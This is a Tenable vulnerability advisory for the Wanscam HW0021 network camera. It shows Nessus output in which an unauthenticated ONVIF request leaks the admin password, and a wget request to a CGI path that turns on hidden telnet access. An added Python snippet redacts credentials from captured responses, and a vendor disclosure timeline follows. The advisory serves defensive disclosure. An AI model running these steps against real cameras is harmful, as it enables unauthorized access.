
[R1] Wanscam Network Camera Multiple Vulnerabilities

Medium

Synopsis

While investigating Pierre Kim's disclosure, "Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server", Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities F-Secure encountered in Foscam devices. It's unclear to Tenable how Foscam and Wanscam are related.

CVE-2017-11510: Administrator Username and Password Disclosure

The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request, it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation:
LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl 
----------[ Executing onvif_detect.nbin ]------

The ONVIF service listening on UDP port 3702 advertises
the following information:

Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0

audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:

http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media

----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------

It was possible to obtain a screenshot from the following URL
on the remote camera: 

http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&

----------[ Finished ./onvif_get_snapshot.nasl ]------
You can see the username (admin) and password (cheesedoodle) in the output of the final plugin.
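
For auditing captured ONVIF traffic, the following added example (not part of the original advisory or of Nessus) parses a GetSnapshotUri response offline and reports any URI that carries credentials, redacting the values before they reach a report. The SOAP envelope is a constructed sample wrapped around the URL shown above, and the list of credential-like parameter names other than -usr and -pwd is an assumption.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

TT_URI = "{http://www.onvif.org/ver10/schema}Uri"
# Assumed list of credential-like parameter names; '-usr'/'-pwd' are from the page.
CRED_KEYS = {"usr", "user", "username", "pwd", "pass", "passwd", "password"}

# Constructed response carrying the URL shown in the plugin output above.
SAMPLE_RESPONSE = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
    xmlns:trt="http://www.onvif.org/ver10/media/wsdl"
    xmlns:tt="http://www.onvif.org/ver10/schema">
  <s:Body><trt:GetSnapshotUriResponse><trt:MediaUri>
    <tt:Uri>http://192.168.1.178:80/web/auto.jpg?-usr=admin&amp;-pwd=cheesedoodle&amp;</tt:Uri>
  </trt:MediaUri></trt:GetSnapshotUriResponse></s:Body>
</s:Envelope>"""


def audit_uri(uri):
    """Return (leaking fields, URI with credentials removed) for one URI."""
    parts = urlsplit(uri)
    leaks = []
    if parts.username or parts.password:
        leaks.append("userinfo")
    kept = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lstrip("-").lower() in CRED_KEYS:
            leaks.append(key)
            value = "REDACTED"  # never copy the secret into reports or logs
        kept.append((key, value))
    host = parts.netloc.rpartition("@")[2]  # drop any user:pass@ prefix
    return leaks, urlunsplit((parts.scheme, host, parts.path, urlencode(kept), ""))


def audit_response(soap_xml):
    """Audit every tt:Uri element in a captured GetSnapshotUri response."""
    # The XML comes from an untrusted device: refuse DTDs (entity expansion).
    if "<!DOCTYPE" in soap_xml or "<!ENTITY" in soap_xml:
        raise ValueError("DTD in SOAP response refused")
    root = ET.fromstring(soap_xml)
    return [audit_uri((el.text or "").strip()) for el in root.iter(TT_URI)]


if __name__ == "__main__":
    for leaks, redacted in audit_response(SAMPLE_RESPONSE):
        status = "LEAK " + ",".join(leaks) if leaks else "ok"
        print(f"{status}: {redacted}")
```
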

Hidden Telnet Functionality

Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi, then telnetd starts up:
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
albinolobster@ubuntu:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.

IPCamera login: 

Solution

A patch has not been published.

Disclosure Timeline

08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected], [email protected], [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out a Word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenable responds that we understand that but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2017-11510
Tenable Advisory ID: TRA-2017-33
Credit: Jacob Baines, Tenable Network Security
CVSSv2 Base / Temporal Score: 5.0 / 5.0
CVSSv2 Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Affected Products: Wanscam HW0021 firmware 11.6.5.1.1-20161213
Risk Factor: Medium

Advisory Timeline

2017-11-10 - [R1] Initial Release
